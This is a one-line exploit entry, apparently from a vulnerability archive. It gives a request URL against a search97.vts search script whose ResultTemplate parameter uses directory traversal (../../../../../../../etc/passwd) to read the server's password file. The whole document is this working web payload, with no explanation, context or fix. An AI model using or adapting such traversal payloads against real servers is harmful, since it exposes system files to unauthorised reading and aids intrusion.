Exploit: http://www.xxx.com/search97.vts ?HLNavigate=On&querytext=dcm &ServerKey=Primary &ResultTemplate=../../../../../../../etc/passwd &ResultStyle=simple &ResultCount=20 &collection=books